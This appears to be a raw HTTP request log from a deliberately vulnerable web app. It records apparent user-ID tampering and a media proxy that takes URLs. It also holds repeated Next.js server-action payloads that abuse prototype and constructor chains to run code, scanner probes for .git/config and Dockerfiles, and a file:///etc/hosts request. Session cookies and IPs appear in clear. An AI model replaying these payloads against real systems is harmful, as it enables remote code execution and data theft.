Sec-Fetch-Dest: empty
Priority: u=0
Cookie: auth=sess_1774028793844765616; user_id=1
Accept: */*
Accept-Encoding: gzip, deflate, br
X-Forwarded-Proto: https
Sec-Gpc: 1
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
Te: trailers
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
X-Forwarded-For: 79.139.135.199
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:52044
Query: user=17
Path: /cabinet
URL: /cabinet?user=17
Method: GET
[2026-03-21 10:23:38] === HTTP Request ===
[2026-03-21 10:23:38] Main page accessed - IP: 172.30.0.12:52044
===================
Priority: u=0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Te: trailers
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate, br
X-Forwarded-For: 79.139.135.199
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Cookie: auth=sess_1774028793844765616; user_id=1
Accept: */*
Via: 2.0 Caddy
Sec-Gpc: 1
Sec-Fetch-Dest: empty
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:52044
Path: /
URL: /
Method: GET
[2026-03-21 10:23:38] === HTTP Request ===
[2026-03-21 10:23:35] Salary page accessed - IP: 172.30.0.12:52044
===================
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Mode: cors
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
Via: 2.0 Caddy
Cookie: auth=sess_1774028793844765616; user_id=1
X-Forwarded-For: 79.139.135.199
Te: trailers
Sec-Fetch-Site: same-origin
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate, br
X-Forwarded-Proto: https
Sec-Gpc: 1
Priority: u=0
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:52044
Path: /salary
URL: /salary
Method: GET
[2026-03-21 10:23:35] === HTTP Request ===
[2026-03-21 10:23:30] Cabinet page accessed - user_id: 17, IP: 172.30.0.12:52044
===================
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept: */*
Te: trailers
Sec-Gpc: 1
Sec-Fetch-Site: same-origin
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Priority: u=0
Cookie: auth=sess_1774028793844765616; user_id=1
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-Proto: https
X-Forwarded-For: 79.139.135.199
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:52044
Query: user=17
Path: /cabinet
URL: /cabinet?user=17
Method: GET
[2026-03-21 10:23:30] === HTTP Request ===
[2026-03-21 10:20:39] Salary page accessed - IP: 172.30.0.12:49064
===================
X-Forwarded-For: 79.139.135.199
Via: 2.0 Caddy
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Dest: empty
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Priority: u=0
X-Forwarded-Proto: https
Te: trailers
Cookie: auth=sess_1774029942171781665; user_id=1
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept-Encoding: gzip, deflate, br
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:49064
Path: /salary
URL: /salary
Method: GET
[2026-03-21 10:20:39] === HTTP Request ===
[2026-03-21 10:20:29] Salary page accessed - IP: 172.30.0.12:49064
===================
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Authorization: Bearer Bearer eyJhbGciOiJIU...
Via: 2.0 Caddy
X-Forwarded-Proto: https
X-Forwarded-For: 79.139.135.199
Priority: u=0
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-Host: admin.vulnberries.ru
Te: trailers
Sec-Gpc: 1
Cookie: auth=sess_1774028793844765616; user_id=1
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:49064
Path: /salary
URL: /salary
Method: GET
[2026-03-21 10:20:29] === HTTP Request ===
[2026-03-21 09:56:18] Defect detail page accessed - defect_id: x, IP: 172.30.0.12:43612
===================
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Mode: no-cors
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
Sec-Fetch-Site: same-origin
Priority: u=4, i
X-Forwarded-Proto: https
X-Forwarded-For: 79.139.135.199
Te: trailers
Accept: image/avif,image/webp,image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5
Via: 2.0 Caddy
Sec-Fetch-Dest: image
Cookie: auth=sess_1774029942171781665; user_id=1
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate, br
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:43612
Path: /defects/x
URL: /defects/x
Method: GET
[2026-03-21 09:56:18] === HTTP Request ===
[2026-03-21 09:56:18] Media proxy request - url: https://media.vulnberries.ru/media?filename=28, IP: 172.30.0.12:43604
===================
If-Modified-Since: Thu, 19 Mar 2026 16:40:12 GMT
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept: */*
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 79.139.135.199
Sec-Fetch-Dest: empty
Te: trailers
Sec-Fetch-Site: same-origin
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
Via: 2.0 Caddy
Sec-Fetch-Mode: cors
Priority: u=4
Cookie: auth=sess_1774029942171781665; user_id=1
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:43604
Query: url=https%3A%2F%2Fmedia.vulnberries.ru%2Fmedia%3Ffilename%3D28
Path: /api/media
URL: /api/media?url=https%3A%2F%2Fmedia.vulnberries.ru%2Fmedia%3Ffilename%3D28
Method: GET
[2026-03-21 09:56:18] === HTTP Request ===
[2026-03-21 09:56:18] Defect detail page accessed - defect_id: fa06e9e0-407d-4a62-8bd0-7fcf6fe93e72, IP: 172.30.0.12:43604
===================
Sec-Fetch-Mode: cors
Priority: u=0
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-Proto: https
Sec-Fetch-Dest: empty
Cookie: auth=sess_1774029942171781665; user_id=1
Accept-Encoding: gzip, deflate, br
Via: 2.0 Caddy
Te: trailers
Sec-Fetch-Site: same-origin
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 79.139.135.199
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:43604
Path: /defects/fa06e9e0-407d-4a62-8bd0-7fcf6fe93e72
URL: /defects/fa06e9e0-407d-4a62-8bd0-7fcf6fe93e72
Method: GET
[2026-03-21 09:56:18] === HTTP Request ===
[2026-03-21 08:00:25] Main page accessed - IP: 178.128.32.203:45242
===================
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 178.128.32.203:45242
Path: /
URL: /
Method: GET
[2026-03-21 08:00:25] === HTTP Request ===
[2026-03-21 07:45:39] Main page accessed - IP: 188.166.218.20:43444
===================
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 188.166.218.20:43444
Path: /
URL: /
Method: GET
[2026-03-21 07:45:39] === HTTP Request ===
[2026-03-21 07:31:39] Main page accessed - IP: 198.235.24.50:58500
===================
Accept-Encoding: gzip
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 198.235.24.50:58500
Path: /
URL: /
Method: GET
[2026-03-21 07:31:39] === HTTP Request ===
===================
X-Openai-Host-Hash: 867116608
From: oai-searchbot(at)openai.com
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 74.7.244.7
Via: 2.0 Caddy
Accept-Encoding: gzip, br, deflate
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:33636
Path: /robots.txt
URL: /robots.txt
Method: GET
[2026-03-21 07:26:50] === HTTP Request ===
[2026-03-21 06:17:47] Main page accessed - IP: 198.235.24.235:54919
===================
Accept: */*
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.0
Host:
RemoteAddr: 198.235.24.235:54919
Path: /
URL: /
Method: GET
[2026-03-21 06:17:47] === HTTP Request ===
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 85.217.140.10:41064
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-21 03:33:36] === HTTP Request ===
[2026-03-21 03:33:36] Main page accessed - IP: 85.217.140.10:41058
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; ModatScanner/1.2; +https://modat.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 85.217.140.10:41058
Path: /
URL: /
Method: GET
[2026-03-21 03:33:36] === HTTP Request ===
[2026-03-21 03:17:05] Main page accessed - IP: 176.65.149.45:46398
===================
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 176.65.149.45:46398
Path: /
URL: /
Method: GET
[2026-03-21 03:17:05] === HTTP Request ===
===================
------WebKitFormBoundaryx1199879810869--
------WebKitFormBoundaryx1199879810869
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx1199879810869
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 155266+true+7727898;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx1199879810869
Next-Action: x
User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; he-il; NEO-X5-116A Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
Connection: close
Content-Length: 522
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx1199879810869
X-Nextjs-Request-Id: poop1234
X-Nextjs-Html-Request-Id: ilovepoop_1199879810869
Accept-Encoding: gzip, deflate
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 193.32.162.28:46264
Path: /api/route
URL: /api/route
Method: POST
[2026-03-21 03:02:59] === HTTP Request ===
===================
------WebKitFormBoundaryx2506254123115--
------WebKitFormBoundaryx2506254123115
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx2506254123115
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 297443+true+8425998;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx2506254123115
User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx2506254123115
Next-Action: x
X-Nextjs-Html-Request-Id: ilovepoop_2506254123115
X-Nextjs-Request-Id: poop1234
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 522
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 193.32.162.28:46252
Path: /app
URL: /app
Method: POST
[2026-03-21 03:02:59] === HTTP Request ===
===================
------WebKitFormBoundaryx1213663687195--
------WebKitFormBoundaryx1213663687195
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx1213663687195
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 141798+true+8559103;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx1213663687195
X-Nextjs-Html-Request-Id: ilovepoop_1213663687195
X-Nextjs-Request-Id: poop1234
Accept-Encoding: gzip, deflate
Content-Length: 522
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx1213663687195
Next-Action: x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 193.32.162.28:46240
Path: /_next/server
URL: /_next/server
Method: POST
[2026-03-21 03:02:59] === HTTP Request ===
===================
------WebKitFormBoundaryx801028608227--
------WebKitFormBoundaryx801028608227
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx801028608227
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 107443+true+7455382;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx801028608227
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
X-Nextjs-Html-Request-Id: ilovepoop_801028608227
X-Nextjs-Request-Id: poop1234
Next-Action: x
Content-Length: 518
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx801028608227
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 193.32.162.28:46220
Path: /api
URL: /api
Method: POST
[2026-03-21 03:02:59] === HTTP Request ===
===================
------WebKitFormBoundaryx70656777341--
------WebKitFormBoundaryx70656777341
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx70656777341
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 49045+true+1440652;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx70656777341
X-Nextjs-Request-Id: poop1234
Content-Length: 513
X-Nextjs-Html-Request-Id: ilovepoop_70656777341
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx70656777341
Connection: close
Next-Action: x
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.6998.135 Mobile Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 193.32.162.28:46194
Path: /_next
URL: /_next
Method: POST
[2026-03-21 03:02:58] === HTTP Request ===
[2026-03-21 03:02:57] Main page accessed - IP: 193.32.162.28:46170
===================
------WebKitFormBoundaryx389976833010--
------WebKitFormBoundaryx389976833010
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx389976833010
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 48707+true+8006587;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx389976833010
X-Nextjs-Html-Request-Id: ilovepoop_389976833010
X-Nextjs-Request-Id: poop1234
Next-Action: x
Content-Length: 517
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx389976833010
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; he-il; NEO-X5-116A Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 193.32.162.28:46170
Path: /
URL: /
Method: POST
[2026-03-21 03:02:57] === HTTP Request ===
===================
------WebKitFormBoundaryx267549026941--
------WebKitFormBoundaryx267549026941
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx267549026941
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 35730+true+7488078;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx267549026941
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx267549026941
X-Nextjs-Request-Id: poop1234
Accept-Encoding: gzip, deflate
Connection: close
X-Nextjs-Html-Request-Id: ilovepoop_267549026941
Next-Action: x
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/134.0.6998.99 Mobile/15E148 Safari/604.1
Content-Length: 517
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.18:50356
Path: /api/route
URL: /api/route
Method: POST
[2026-03-21 01:05:58] === HTTP Request ===
===================
------WebKitFormBoundaryx122274053761--
------WebKitFormBoundaryx122274053761
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx122274053761
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 29856+true+4095460;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx122274053761
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; he-il; NEO-X5-116A Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
X-Nextjs-Html-Request-Id: ilovepoop_122274053761
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx122274053761
X-Nextjs-Request-Id: poop1234
Next-Action: x
Connection: close
Content-Length: 517
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.18:50342
Path: /app
URL: /app
Method: POST
[2026-03-21 01:05:53] === HTTP Request ===
===================
------WebKitFormBoundaryx71370625749--
------WebKitFormBoundaryx71370625749
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx71370625749
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 12916+true+5525753;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx71370625749
Next-Action: x
User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; he-il; NEO-X5-116A Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
X-Nextjs-Html-Request-Id: ilovepoop_71370625749
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx71370625749
X-Nextjs-Request-Id: poop1234
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 513
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.18:59568
Path: /_next/server
URL: /_next/server
Method: POST
[2026-03-21 01:05:51] === HTTP Request ===
===================
------WebKitFormBoundaryx1348501522006--
------WebKitFormBoundaryx1348501522006
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx1348501522006
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 162327+true+8307315;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx1348501522006
X-Nextjs-Html-Request-Id: ilovepoop_1348501522006
X-Nextjs-Request-Id: poop1234
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; he-il; NEO-X5-116A Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx1348501522006
Next-Action: x
Connection: close
Content-Length: 522
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.18:59560
Path: /api
URL: /api
Method: POST
[2026-03-21 01:05:46] === HTTP Request ===
===================
------WebKitFormBoundaryx882295796333--
------WebKitFormBoundaryx882295796333
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx882295796333
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 137252+true+6428291;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx882295796333
Next-Action: x
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 518
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx882295796333
X-Nextjs-Request-Id: poop1234
X-Nextjs-Html-Request-Id: ilovepoop_882295796333
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.18:59940
Path: /_next
URL: /_next
Method: POST
[2026-03-21 01:05:41] === HTTP Request ===
[2026-03-21 01:05:35] Main page accessed - IP: 45.205.1.18:59926
===================
------WebKitFormBoundaryx601207819829--
------WebKitFormBoundaryx601207819829
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx601207819829
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 84028+true+7154851;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx601207819829
X-Nextjs-Request-Id: poop1234
Accept-Encoding: gzip, deflate
Connection: close
X-Nextjs-Html-Request-Id: ilovepoop_601207819829
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Content-Length: 517
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx601207819829
Next-Action: x
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.18:59926
Path: /
URL: /
Method: POST
[2026-03-21 01:05:35] === HTTP Request ===
[2026-03-20 23:59:51] Main page accessed - IP: 178.128.214.41:52580
===================
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 178.128.214.41:52580
Path: /
URL: /
Method: GET
[2026-03-20 23:59:51] === HTTP Request ===
[2026-03-20 23:15:56] Main page accessed - IP: 139.59.116.9:48142
===================
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 139.59.116.9:48142
Path: /
URL: /
Method: GET
[2026-03-20 23:15:56] === HTTP Request ===
[2026-03-20 23:08:33] Main page accessed - IP: 159.89.88.188:40146
===================
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 159.89.88.188:40146
Path: /
URL: /
Method: GET
[2026-03-20 23:08:33] === HTTP Request ===
[2026-03-20 22:55:38] Main page accessed - IP: 134.209.95.237:52248
===================
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 134.209.95.237:52248
Path: /
URL: /
Method: GET
[2026-03-20 22:55:38] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 79.124.40.174:32820
Path: /jars
URL: /jars
Method: GET
[2026-03-20 22:41:51] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 162.142.125.217:7124
Path: /tz95ua04sznvhn6
URL: /tz95ua04sznvhn6
Method: GET
[2026-03-20 21:55:02] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Connection: close
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 162.142.125.217:7104
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-20 21:55:01] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Connection: close
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 162.142.125.217:7098
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-20 21:55:00] === HTTP Request ===
[2026-03-20 21:55:00] Login page accessed - IP: 162.142.125.217:7094
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 162.142.125.217:7094
Path: /login
URL: /login
Method: GET
[2026-03-20 21:55:00] === HTTP Request ===
===================
Protocol: HTTP/2.0
Host:
RemoteAddr: 162.142.125.217:7080
Path: *
URL: *
Method: PRI
[2026-03-20 21:55:00] === HTTP Request ===
[2026-03-20 21:54:59] Main page accessed - IP: 162.142.125.217:7066
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 162.142.125.217:7066
Path: /
URL: /
Method: GET
[2026-03-20 21:54:59] === HTTP Request ===
===================
User-Agent: l9explore/1.2.2
Connection: close
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:60276
Path: /main.go
URL: /main.go
Method: GET
[2026-03-20 19:12:54] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:60260
Path: /.git/config
URL: /.git/config
Method: GET
[2026-03-20 19:12:54] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:60254
Path: /Dockerfile
URL: /Dockerfile
Method: GET
[2026-03-20 19:12:54] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:60240
Path: /docker-compose.yml
URL: /docker-compose.yml
Method: GET
[2026-03-20 19:12:54] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:60236
Query: url=file:///etc/hosts
